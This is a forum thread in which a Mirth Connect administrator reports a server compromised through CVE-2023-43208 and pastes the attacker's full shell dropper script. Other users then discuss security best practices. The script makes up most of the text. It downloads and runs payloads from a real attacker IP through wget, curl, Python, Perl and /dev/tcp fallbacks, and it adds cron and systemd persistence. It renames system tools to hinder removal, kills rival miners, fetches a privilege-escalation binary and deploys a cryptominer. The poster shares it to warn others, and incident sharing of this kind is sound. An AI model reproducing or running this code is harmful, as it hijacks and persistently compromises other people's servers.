How to kill mirthd?

[ppazos]

I have a process mirthd spawning even if I stopped the mirth service.

It's actually eating memory and cpu on a server and when I kill one, another is spawned.

Not sure what mirthd is, how it's spawned or how to kill it.

Any ideas?

[jonbartels]

What OS are you using?

mirthd is likely the service definition or daemon. To properly stop it you need to use the appropriate service command to stop the service.

[ppazos]

service command didn't stop it, did that several times in several ways, with mcservice, systemctl and service.

[ppazos]

It seems we were attacked by this vulnerability in Mirth Connect Server https://www.horizon3.ai/attack-research/attack-blogs/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/

A python script calling this URL was executed: http://192.112.255.229/mobile/mirth.php

This is the contents of that URL which is another script:

CRON_ADD() {
   local JOB="$1"
   local FILTER=$(echo "$JOB" | sed -e 's^*^\\*^g' -e 's^\.^\\.^g')
   command -v crontab >/dev/null || return 1
   (
      crontab -l 2>/dev/null | grep -v -x -e "$FILTER" 2>/dev/null
      echo "$JOB"
   ) | crontab -
   return 0
}
function DIR_WRITABLE() {
  local DIRS=("$HOME" "$PWD" "/dev/shm" "/var/tmp" "/var/run" "/tmp")
  local DIR=""
  for DIR in "${DIRS[@]}"; do
    if [ -d "$DIR" ]; then
      FSP=$(df -BM "$DIR" | awk 'NR==2 {if ($4+0 > 100) print "1"; else print "0"}')
      if [ -w "$DIR" ] && [ $FSP -eq 1 ]; then
        #[ "$DIR" = "/" ] && DIR=""
        echo "$DIR" && return 0
      fi
    fi
  done
  return 1
}
function SVC_INSTALL() {
  local SVC_TITLE="$1"
  local SVC_FILE="$2"
  local EXEC_PATH="$3"
  local TMP_DIR="$4"
  local SUB_SHELL="$5"
  local RESULT=0
  if command -v systemctl >/dev/null && [ $RESULT -eq 0 ]; then
    cat >"$TMP_DIR/$SVC_FILE.service" <<EOL
[Unit]
Description=$SVC_TITLE
[Service]
ExecStart=$EXEC_PATH
Restart=always
RestartSec=10s
TimeoutStartSec=5
[Install]
WantedBy=multi-user.target
EOL
    if [ -z "$SUB_SHELL" ]; then
      mv -f "$TMP_DIR/$SVC_FILE.service" "/etc/systemd/system/$SVC_FILE.service" 2>/dev/null || cp -f "$TMP_DIR/$SVC_FILE.service" "/etc/systemd/system/$SVC_FILE.service" 2>/dev/null && systemctl daemon-reload 2>/dev/null && systemctl enable "$SVC_FILE.service" 2>/dev/null && RESULT=1
    else
      "$SUB_SHELL" -c "mv -f $TMP_DIR/$SVC_FILE.service /etc/systemd/system/$SVC_FILE.service 2>/dev/null || cp -f $TMP_DIR/$SVC_FILE.service /etc/systemd/system/$SVC_FILE.service 2>/dev/null && systemctl daemon-reload 2>/dev/null && systemctl enable $SVC_FILE.service 2>/dev/null && RESULT=1" >/dev/null
    fi
    [ -f "$TMP_DIR/$SVC_FILE.service" ] && rm -f "$TMP_DIR/$SVC_FILE.service" 2>/dev/null
  fi
  if command -v update-rc.d >/dev/null && [ $RESULT -eq 0 ]; then
    cat >"$TMP_DIR/$SVC_FILE" <<EOL
#!/bin/sh
case "$1" in
  start)
    $EXEC_PATH
    ;;
  stop)
    ;;
  *)
    echo "Usage: /etc/init.d/$SVC_FILE {start|stop}"
    exit 1
    ;;
esac
exit 0
EOL
    if [ -z "$SUB_SHELL" ]; then
      mv -f "$TMP_DIR/$SVC_FILE" "/etc/init.d/$SVC_FILE" 2>/dev/null || cp -f "$TMP_DIR/$SVC_FILE" "/etc/init.d/$SVC_FILE" 2>/dev/null && chmod -f 0777 "/etc/init.d/$SVC_FILE" 2>/dev/null && update-rc.d "$SVC_FILE" defaults 2>/dev/null && RESULT=1
    else
      "$SUB_SHELL" -c "mv -f $TMP_DIR/$SVC_FILE /etc/init.d/$SVC_FILE 2>/dev/null || cp -f $TMP_DIR/$SVC_FILE /etc/init.d/$SVC_FILE 2>/dev/null && chmod -f 0777 /etc/init.d/$SVC_FILE 2>/dev/null && update-rc.d $SVC_FILE defaults 2>/dev/null && RESULT=1" >/dev/null
    fi
    [ -f "$TMP_DIR/$SVC_FILE" ] && rm -f "$TMP_DIR/$SVC_FILE" 2>/dev/null
  fi
  if command -v start >/dev/null && [ $RESULT -eq 0 ]; then
    cat >"$TMP_DIR/$SVC_FILE.conf" <<EOL
description "$SVC_TITLE"
start on runlevel [2345]
stop on runlevel [!2345]
script
    exec $EXEC_PATH
end script
EOL
    if [ -z "$SUB_SHELL" ]; then
      mv -f "$TMP_DIR/$SVC_FILE.conf" "/etc/init/$SVC_FILE.conf" 2>/dev/null || cp -f "$TMP_DIR/$SVC_FILE.conf" "/etc/init/$SVC_FILE.conf" 2>/dev/null && RESULT=1
    else
      "$SUB_SHELL" -c "mv -f $TMP_DIR/$SVC_FILE.conf /etc/init/$SVC_FILE.conf 2>/dev/null || cp -f $TMP_DIR/$SVC_FILE.conf /etc/init.d/$SVC_FILE.conf && RESULT=1" >/dev/null
    fi
    [ -f "$TMP_DIR/$SVC_FILE.conf" ] && rm -f "$TMP_DIR/$SVC_FILE.conf" 2>/dev/null
  fi
  [ $RESULT -eq 1 ] && return 0 || return 1
}
function SVC_START() {
  local SERVICE="$1"
  local EXEC_PATH="$2"
  local SUB_SHELL="$3"
  local RESULT=0
  if command -v systemctl >/dev/null && [ $RESULT -eq 0 ]; then
    if [ -z "$SUB_SHELL" ]; then
      systemctl start "$SERVICE.service" 2>/dev/null && RESULT=1
    else
      "$SUB_SHELL" -c "systemctl start $SERVICE.service 2>/dev/null && RESULT=1" >/dev/null
    fi
  fi
  if command -v update-rc.d >/dev/null && [ $RESULT -eq 0 ]; then
    if [ -z "$SUB_SHELL" ]; then
      $EXEC_PATH >/dev/null 2>&1 & RESULT=1
    else
      "$SUB_SHELL" -c "$EXEC_PATH >/dev/null 2>&1 & RESULT=1" >/dev/null
    fi
  fi
  if command -v start >/dev/null && [ $RESULT -eq 0 ]; then
    if [ -z "$SUB_SHELL" ]; then
      start "$SERVICE" 2>/dev/null && RESULT=1
    else
      "$SUB_SHELL" -c "start $SERVICE 2>/dev/null && RESULT=1" >/dev/null
    fi
  fi
  [ $RESULT -eq 1 ] && return 0 || return 1
}
function DL_WGET() {
  local URL="$1"
  local RPATH="$2"
  local LPATH="$3"
  local TOOL="$4"
  local BINS=("wget" "wget-ssl" "wget-nossl" "ter_wget" "wwggeett" "_wget")
  local BIN=""
  for BIN in "${BINS[@]}"; do
    [ -z "$TOOL" ] && TOOL="$BIN"
    if command -v "$BIN" >/dev/null && [ "$BIN" = "$TOOL" ]; then
      if [ -z "$LPATH" ]; then
        "$BIN" --no-check-certificate -qO- "$URL/$RPATH" 2>/dev/null || "$BIN" -qO- "$URL/$RPATH" 2>/dev/null || return 1
        return 0
      elif [ "$LPATH" = "[CMD]" ]; then
        echo "($BIN --no-check-certificate -qO- \"$URL/$RPATH\" 2>/dev/null||$BIN -qO- \"$URL/$RPATH\" 2>/dev/null)" && return 0
      else
        "$BIN" --no-check-certificate -q -O "$LPATH" "$URL/$RPATH" 2>/dev/null || "$BIN" -q -O "$LPATH" "$URL/$RPATH" 2>/dev/null || return 1
        return 0
      fi
    fi
  done
  return 1
}
function DL_CURL() {
  local URL="$1"
  local RPATH="$2"
  local LPATH="$3"
  local TOOL="$4"
  local BINS=("curl" "ter_curl" "ccuurrll" "_curl")
  local BIN=""
  for BIN in "${BINS[@]}"; do
    [ -z "$TOOL" ] && TOOL="$BIN"
    if command -v "$BIN" >/dev/null && [ "$BIN" = "$TOOL" ]; then
      if [ -z "$LPATH" ]; then
        "$BIN" -s -k "$URL/$RPATH" 2>/dev/null || "$BIN" -s "$URL/$RPATH" 2>/dev/null || return 1
        return 0
      elif [ "$LPATH" = "[CMD]" ]; then
        echo "($BIN -s -k \"$URL/$RPATH\" 2>/dev/null||$BIN -s \"$URL/$RPATH\" 2>/dev/null)" && return 0
      else
        "$BIN" -k -s -o "$LPATH" "$URL/$RPATH" 2>/dev/null || "$BIN" -s -o "$LPATH" "$URL/$RPATH" 2>/dev/null || return 1
        return 0
      fi
    fi
  done
  return 1
}
function DL_PYTHON2() {
  local URL="$1"
  local RPATH="$2"
  local LPATH="$3"
  local TOOL="$4"
  local BINS=("python2" "python2.7" "python2.6" "python2.5" "python")
  local BIN=""
  for BIN in "${BINS[@]}"; do
    [ -z "$TOOL" ] && TOOL="$BIN"
    if command -v "$BIN" >/dev/null && [ "$BIN" = "$TOOL" ]; then
      if [ -z "$LPATH" ]; then
        "$BIN" -c "import urllib;print urllib.urlopen('$URL/$RPATH').read()" | tr -d '\n' 2>/dev/null || return 1
        return 0
      elif [ "$LPATH" = "[CMD]" ]; then
        echo "$BIN -c \"import urllib;print urllib.urlopen('$URL/$RPATH').read()\"|tr -d'\n'" && return 0
      else
        "$BIN" -c "import urllib;urllib.urlretrieve('$URL/$RPATH','$LPATH')" 2>/dev/null || return 1
        return 0
      fi
    fi
  done
  return 1
}
function DL_PYTHON3() {
  local URL="$1"
  local RPATH="$2"
  local LPATH="$3"
  local TOOL="$4"
  local BINS=("python3" "python3.9" "python3.8" "python3.7" "python3.6" "python3.5" "python3.4" "python")
  local BIN=""
  for BIN in "${BINS[@]}"; do
    [ -z "$TOOL" ] && TOOL="$BIN"
    if command -v "$BIN" >/dev/null && [ "$BIN" = "$TOOL" ]; then
      if [ -z "$LPATH" ]; then
        "$BIN" -c "import urllib.request;print(urllib.request.urlopen('$URL/$RPATH').read().decode('utf-8'),end='')" 2>/dev/null || return 1
        return 0
      elif [ "$LPATH" = "[CMD]" ]; then
        echo "$BIN -c \"import urllib.request;print(urllib.request.urlopen('$URL/$RPATH').read().decode('utf-8'),end='')\"" && return 0
      else
        "$BIN" -c "import urllib.request;urllib.request.urlretrieve('$URL/$RPATH','$LPATH')" 2>/dev/null || return 1
        return 0
      fi
    fi
  done
  return 1
}
function DL_PERL() {
  local URL="$1"
  local RPATH="$2"
  local LPATH="$3"
  local TOOL="$4"
  local BINS=("perl" "perl3" "perl2")
  local BIN=""
  local HOST=""
  local PORT="80"
  local SSL=0
  local PROT="${URL%%://*}"
  local UWPROT="${URL#*://}"
  local HOSTPORT="${UWPROT%%/*}"
  [ "$PROT" = "https" ] && SSL=1 || SSL=0
  if [[ "$HOSTPORT" == *":"* ]]; then
    HOST="${HOSTPORT%%:*}"
    PORT="${HOSTPORT#*:}"
  else
    HOST="$HOSTPORT"
    [ "$SSL" -eq 0 ] && PORT="80" || PORT="443"
  fi
  for BIN in "${BINS[@]}"; do
    [ -z "$TOOL" ] && TOOL="$BIN"
    if command -v "$BIN" >/dev/null && [ "$BIN" = "$TOOL" ]; then
      if [ -z "$LPATH" ]; then
        if [ "$SSL" -eq 0 ]; then
          "$BIN" -e 'use IO::Socket::INET;$|=1;my($H,$F)=("'"$HOST"'","/'"$RPATH"'");my $S=IO::Socket::INET->new(PeerAddr=>$H,PeerPort=>'"$PORT"',Proto=>"tcp") or die $@;print $S "GET $F HTTP/1.0\r\nHost: $H\r\n\r\n";while(<$S>){print if $headerpassed;$headerpassed=1 if /^\r$/};exit 0;' 2>/dev/null || return 1
          return 0
        else
          "$BIN" -MLWP::UserAgent -e '$U=LWP::UserAgent->new(ssl_opts=>{verify_hostname=>0,SSL_verify_mode=>0x00});$R=$U->get("'"$URL/$RPATH"'");if($R->is_success){print $R->decoded_content;exit 0;}else{exit 1;}' 2>/dev/null || "$BIN" -MHTTP::Tiny -e '$R=HTTP::Tiny->new(verify_SSL=>0)->get("'"$URL/$RPATH"'");if($R->is_success){print $R->decoded_content;exit 0;}else{exit 1;}' 2>/dev/null || return 1
          return 0
        fi
      elif [ "$LPATH" = "[CMD]" ]; then
        if [ "$SSL" -eq 0 ]; then
          echo "$BIN -e 'use IO::Socket::INET;$|=1;my(\$H,\$F)=(\"$HOST\",\"/$RPATH\");my \$S=IO::Socket::INET->new(PeerAddr=>\$H,PeerPort=>$PORT,Proto=>"tcp") or die \$@;print \$S \"GET \$F HTTP/1.0\r\nHost: \$H\r\n\r\n\";while(<\$S>){print if \$headerpassed;\$headerpassed=1 if /^\r$/};exit 0;'" && return 0
        else
          echo "($BIN -MLWP::UserAgent -e '\$U=LWP::UserAgent->new(ssl_opts=>{verify_hostname=>0,SSL_verify_mode=>0x00});\$R=\$U->get(\"$URL/$RPATH\");if(\$R->is_success){print \$R->decoded_content;exit 0;}else{exit 1;}' 2>/dev/null||$BIN -MHTTP::Tiny -e '\$R=HTTP::Tiny->new(verify_SSL=>0)->get(\"$URL/$RPATH\");if(\$R->is_success){print \$R->decoded_content;exit 0;}else{exit 1;}' 2>/dev/null)" && return 0
        fi
      else
        if [ "$SSL" -eq 0 ]; then
          "$BIN" -e 'use IO::Socket::INET;$|=1;my($H,$F)=("'"$HOST"'","/'"$RPATH"'");my $S=IO::Socket::INET->new(PeerAddr=>$H,PeerPort=>'"$PORT"',Proto=>"tcp") or die $@;print $S "GET $F HTTP/1.0\r\nHost: $H\r\n\r\n";while(<$S>){print if $headerpassed;$headerpassed=1 if /^\r$/};exit 0;' 2>/dev/null > "$LPATH" || return 1
          return 0
        else
          "$BIN" -MLWP::UserAgent -e '$U=LWP::UserAgent->new(ssl_opts=>{verify_hostname=>0,SSL_verify_mode=>0x00});$R=$U->get("'"$URL/$RPATH"'");if($R->is_success){print $R->decoded_content;exit 0;}else{exit 1;}' 2>/dev/null > "$LPATH" || "$BIN" -MHTTP::Tiny -e '$R=HTTP::Tiny->new(verify_SSL=>0)->get("'"$URL/$RPATH"'");if($R->is_success){print $R->decoded_content;exit 0;}else{exit 1;}' 2>/dev/null > "$LPATH" || return 1
          return 0
        fi
      fi
    fi
  done
  return 1
}
function DL_DEVTCP() {
  local URL="$1"
  local RPATH="$2"
  local LPATH="$3"
  local HOST=""
  local PORT="80"
  local PROT="${URL%%://*}"
  local UWPROT="${URL#*://}"
  local HOSTPORT="${UWPROT%%/*}"
  [ "$PROT" = "https" ] && return 1
  if [[ "$HOSTPORT" == *":"* ]]; then
    HOST="${HOSTPORT%%:*}"
    PORT="${HOSTPORT#*:}"
  else
    HOST="$HOSTPORT"
    PORT="80"
  fi
  if [ "$LPATH" = "[CMD]" ]; then
    echo "bash -c '(exec 3<>/dev/tcp/$HOST/$PORT;printf \\'GET /%s HTTP/1.1\r\nHost: %s\r\n\r\n\\' \"$RPATH\" \"$HOST\" >&3;while IFS= read -r header;do [[ \"\$header\" == $\'\r\' ]] && break;done <&3;cat <&3;exec 3>&-)'" && return 0
  fi
  exec 3<>/dev/tcp/"$HOST"/"$PORT"
  printf 'GET /%s HTTP/1.1\r\nHost: %s\r\n\r\n' "$RPATH" "$HOST" >&3
  while IFS= read -r header; do
    [[ "$header" == $'\r' ]] && break
  done <&3
  if [ -z "$LPATH" ]; then
    cat <&3
  else
    cat <&3 2>/dev/null > "$LPATH"
  fi
  exec 3>&-
  return 0
}
function DOWNLOAD() {
  local URL="$1"
  local RPATH="$2"
  local LPATH="$3"
  local TOOL="$4"
  local STOOL="$5"
  if [ "$TOOL" = "wget" ]; then
    DL_WGET "$URL" "$RPATH" "$LPATH" "$STOOL"
  elif [ "$TOOL" = "curl" ]; then
    DL_CURL "$URL" "$RPATH" "$LPATH" "$STOOL"
  elif [ "$TOOL" = "python2" ]; then
    DL_PYTHON2 "$URL" "$RPATH" "$LPATH" "$STOOL"
  elif [ "$TOOL" = "python3" ]; then
    DL_PYTHON3 "$URL" "$RPATH" "$LPATH" "$STOOL"
  elif [ "$TOOL" = "perl" ]; then
    DL_PERL "$URL" "$RPATH" "$LPATH" "$STOOL"
  elif [ "$TOOL" = "devtcp" ]; then
    DL_DEVTCP "$URL" "$RPATH" "$LPATH"
  else
    DL_WGET "$URL" "$RPATH" "$LPATH" "$STOOL" || DL_CURL "$URL" "$RPATH" "$LPATH" "$STOOL" || DL_PYTHON2 "$URL" "$RPATH" "$LPATH" "$STOOL" || DL_PYTHON3 "$URL" "$RPATH" "$LPATH" "$STOOL" || DL_PERL "$URL" "$RPATH" "$LPATH" "$STOOL" || DL_DEVTCP "$URL" "$RPATH" "$LPATH"
  fi
  return $?
}
ulimit -n 65535 2>/dev/null
ROOT=$([ $(id -u) -eq 0 ] && echo 1 || echo 0)
ROOTP=0
OS_TYPE="$(uname -s)"
ARCH="$(uname -m)"
AR="$([ "$ARCH" == "aarch64" ] && echo arm64 || echo x64)"
PK="dom|lcron|deer|sysctld|ggrep|ofire|bashsssss|moneroocean|c3pool|o_fire|openwire|monit|c386|ngomu|sysctld|kinsing|kdevtmpfsi|linux|kthreaddi|kthreaddo|kdevchecker|94.103.87.71"
IP="190.135.226.69"
PORT="80"
APP="MTHCMTHC"
DIR="sbin"
BIN="mirthd"
RBIN="mirthr"
CBIN="mirthc"
ARGS=" -B"
DURL="http://192.112.255.229"
DPATH="mobile"
DRIG="$([ "$OS_TYPE" == "FreeBSD" ] && echo bsd || echo $AR).tar.gz"
DAPP="mirth.php?app=MTHC"
DROOT="pwn"
WDIR=$(DIR_WRITABLE)
OLDPWD="$PWD"
RET=0
SHELL=$(command -v bash >/dev/null && echo bash || echo sh)
pkill -9 -f "$PK" &>/dev/null || ppkkiill -9 -f "$PK" &>/dev/null
pkill -f "$PK" &>/dev/null || ppkkiill -f "$PK" &>/dev/null
mv /usr/bin/curl /usr/bin/ccuurrll 2>/dev/null
mv /usr/bin/wget /usr/bin/wwggeett 2>/dev/null
mv /usr/bin/ps /usr/bin/ppss 2>/dev/null
mv /usr/bin/pkill /usr/bin/ppkkiill 2>/dev/null
mv /usr/bin/pgrep /usr/bin/ppggrreepp 2>/dev/null
mv /usr/bin/killall /usr/bin/kkiillllaallll 2>/dev/null
#mv /usr/bin/nc /usr/bin/nncc 2>/dev/null
chmod 0777 /usr/bin/ccuurrll 2>/dev/null
chmod 0777 /usr/bin/wwggeett 2>/dev/null
chmod 0777 /usr/bin/ppss 2>/dev/null
chmod 0777 /usr/bin/ppkkiill 2>/dev/null
chmod 0777 /usr/bin/ppggrreepp 2>/dev/null
chmod 0777 /usr/bin/kkiillllaallll 2>/dev/null
#chmod 0777 /usr/bin/nncc 2>/dev/null
crontab -r 2>/dev/null
CRON_CMD=$(DOWNLOAD "$DURL" "$DPATH/$DAPP" "[CMD]")"|bash >/dev/null 2>&1"
CRON_ADD "@reboot $CRON_CMD"
CRON_ADD "* * * * * $CRON_CMD"
pidof dom &>/dev/null && kill -9 $(pidof dom) &>/dev/null
pidof dom &>/dev/null && kill -9 $(pidof dom) &>/dev/null
pidof lcron &>/dev/null && kill -9 $(pidof lcron) &>/dev/null
pidof lcron &>/dev/null && kill -9 $(pidof lcron) &>/dev/null
pidof lcron &>/dev/null && kill -9 $(pidof lcron) &>/dev/null
pidof bashsssss &>/dev/null && kill -9 $(pidof bashsssss) &>/dev/null
pidof kinsing &>/dev/null && kill -9 $(pidof kinsing) &>/dev/null
pidof kdevtmpfsi &>/dev/null && kill -9 $(pidof kdevtmpfsi) &>/dev/null
pidof kthreaddi &>/dev/null && kill -9 $(pidof kthreaddi) &>/dev/null
pidof kthreaddo &>/dev/null && kill -9 $(pidof kthreaddo) &>/dev/null
pkill -9 -f "$PK" &>/dev/null || ppkkiill -9 -f "$PK" &>/dev/null
pkill -f "$PK" &>/dev/null || ppkkiill -f "$PK" &>/dev/null
if ! pgrep -f "$DIR/$BIN$" &>/dev/null && ! ppggrreepp -f "$DIR/$BIN$" &>/dev/null || ! pgrep -f "$DIR/$BIN$ARGS$" &>/dev/null && ! ppggrreepp -f "$DIR/$BIN$ARGS$" &>/dev/null; then
   RET=1
   pkill -9 -f "$CBIN" &>/dev/null || ppkkiill -9 -f "$CBIN" &>/dev/null
   mkdir -p "$WDIR/$DIR" 2>/dev/null && SDIR="$WDIR/$DIR" || SDIR="$WDIR"
   cd "$SDIR"
   chmod -f -R 0777 "$SDIR"
   echo "SETUP DIR: $SDIR"
   if [ $ROOT -eq 0 ]; then
      DOWNLAOD "$DURL" "$DPATH/$DROOT" "$RBIN"
      chmod -f 0777 "$RBIN" 2>/dev/null
      rm -fr 'GCONV_PATH=.' 2>/dev/null
      rm -fr gconv 2>/dev/null
      CROOT=$("./$RBIN" -c "id -u" 2>/dev/null || echo 1)
      [ $CROOT -eq 0 ] && ROOTP=1
   fi
   DOWNLOAD "$DURL" "$DPATH/$DRIG" "$DRIG"
   tar -xzf "$DRIG" &>/dev/null
   mv -f "$AR" "$BIN"
   chmod -f 0777 "$BIN"
   rm -f "$DRIG" 2>/dev/null
   cat config.json.tmp | sed -e 's#APP_#'"$APP"'_'"$IP"'#g' -e 's#"background": true#"background": false#g' -e 's#230:80#230:'"$PORT"'#g' > config.json 2>/dev/null
   rm -f "config.json.tmp" 2>/dev/null
   echo 'for PN in "nc" "wget" "curl" "openwire" "monit" "c386" "ngomu" "sysctld" "kinsing" "kdevtmpfsi" "linux" "kthreaddi" "kthreaddo" "kdevchecker" "94.103.87.71";do pkill -9 -f "$PN" &>/dev/null || pkill -f "$PN" &>/dev/null || ppkkiill -9 -f "$PN" &>/dev/null||kill -9 $(pidof "$PN" 2>/dev/null || echo 999999) 2>/dev/null;done;' > "$CBIN"
   if [ $ROOTP -eq 1 ]; then
      "./$RBIN" -c "mv /usr/bin/curl /usr/bin/ccuurrll 2>/dev/null;mv /usr/bin/wget /usr/bin/wwggeett 2>/dev/null;mv /usr/bin/ps /usr/bin/ppss 2>/dev/null;mv /usr/bin/pkill /usr/bin/ppkkiill 2>/dev/null;mv /usr/bin/pgrep /usr/bin/ppggrreepp 2>/dev/null;mv /usr/bin/killall /usr/bin/kkiillllaallll 2>/dev/null;mv /usr/bin/nc /usr/bin/nncc 2>/dev/null;chmod 0777 /usr/bin/ccuurrll 2>/dev/null;chmod 0777 /usr/bin/wwggeett 2>/dev/null;chmod 0777 /usr/bin/ppss 2>/dev/null;chmod 0777 /usr/bin/ppkkiill 2>/dev/null;chmod 0777 /usr/bin/ppggrreepp 2>/dev/null;chmod 0777 /usr/bin/kkiillllaallll 2>/dev/null;chmod 0777 /usr/bin/nncc 2>/dev/null" >/dev/null
      "./$RBIN" -c "$SDIR/$BIN >/dev/null 2>&1 &" >/dev/null
      "./$RBIN" -c "bash $SDIR/$CBIN >/dev/null 2>&1 &" >/dev/null
   else
      SERVICE_ADD "Mirth Connect Daemon" "mirth_connect" "$SDIR/$BIN --rig-id=MTHCS_190.135.226.69" || "$SDIR/$BIN"$ARGS >/dev/null 2>&1 &
      bash "$SDIR/$CBIN" >/dev/null 2>&1 &
   fi
fi
if [ "$RET" -eq 1 ] && (pgrep -f "$DIR/$BIN$" &>/dev/null || ppggrreepp -f "$DIR/$BIN$" &>/dev/null || pgrep -f "$DIR/$BIN$ARGS$" &>/dev/null || ppggrreepp -f "$DIR/$BIN$ARGS$" &>/dev/null); then
   RET=2
fi
if [ "$RET" -eq 1 ]; then
   echo "___FAIL___"
elif [ "$RET" -eq 2 ]; then
   echo "___RESTORED___"
else
   echo "___OK___"
fi
if [ $ROOT -eq 1 ]; then
   echo "___SYS_ROOT___"
elif [ $ROOTP -eq 1 ]; then
   echo "___PWN_ROOT___"
fi

[ppazos]

NOTE: mirth reported this happened only on Java 8, but we had Java 11 on our server, so I'm not 100% sure if the report from Mirth is correct. REF https://github.com/nextgenhealthcare/connect/wiki/4.4.0---What's-New#remote-code-execution-vulnerability-when-using-java-8-and-elevated-permissions

[pacmano1]

Maybe you should consider helping the community out and standing up a best practice guide based on your experiences rather than throwing it over the fence?

Irrespective of Mirth I would:

1. Not run a process as root.
2. Not expose an admin interface to the general internet for a tool that is not client facing tool. By client facing I mean "an admin interace used by your clients to use your product".
3. Not expose http listeners directly admin or not, rather via load balancers with a WAF/IDS/IPS.
4. Whitelist if possible/appropriate calling endpoints
5. mTLS if possible calling/approrpiate endpoints.
6. Scan my infrastructure for security problems.
7. And, since you cleary did not do this: Closely follow security bulletins and releases for the products you do use.

There is more of course but any product you choose to use should proably be subject to your security standards and best practices Mirth or not.

[ppazos]

@tonygermano What you said before is clear, repeating doesn't add to the discussion. The main point is: there was a huge hole in Mirth, and there still is for many instances out there that were not updated.

This is neither about pointing fingers you didn't do this and he didn't do that. The main point of this thread is showing others that they could be in real and serious danger, and show the actual thing a real hacker was doing in a real deployment of Mirth.

@pacmano1 not sure to who are you referring to. If it's me, if you read carefully, I'm not throwing anything over the fence, I'm providing information. Let's avoid getting emotional here. I'm not a security expert neither, so I might not be capable of providing best practices to anyone. Sure I mentioned NextGen could write about security, and I'm referring to NextGen employees. Though I do not consider that throwing anything over the fence, if it was my product I would do that to help my users, and my users, that trust my tool, might trust me too on that type of documentation. If the documentation is written by a third party, I'm not sure that can be trusted. Last thing I never said this is a Mirth thing, general good security practices can apply to any system, but then, again, this is still a security hole in Mirth and many instances that won't upgrade to 4.5.0 anytime soon. As a community we should be out there shouting this so everyone upgrades to the a fixed version, plus having general good security practices won't hurt :)

[ab-mg-23]

Do you have specific suggestions for The Official Mirth Connect Security Best Practices Guide? I think that has been around since at least the Mirth 3.X baseline but I could be wrong. While I would like Mirth to be more "secure out of the box" there comes a dev/test cost sometimes with that and I understand why some things aren't more locked down out-of-the-box. Reality is; if you want a secure system, you have to secure it.

[pacmano1]

Wow that document is inadequate.

[ppazos]

@ab-mg-23 thanks for the link, there are some good pointers there, though it seems incomplete, specially the networking part, there is a big diagram and small description. For instance the diagram shows to ways of accessing via the administrator port VPN and LAN, I'm guessing LAN means that you are connected to the same physical network and there is no internet traffic. A question would be if there is no other option than those two like SSH tunneling?

One thing I would expect is: if there is a security section in the docs, and Mirth has a security vulnerability, to add information about the vulnerability there, specially on how to proceed in mitigate, avoid or fix the vulnerability. I think the only place this is documented is in the release notes and some document somewhere on GitHub

@pacmano1 can you please expand on what is inadequate?

Thanks!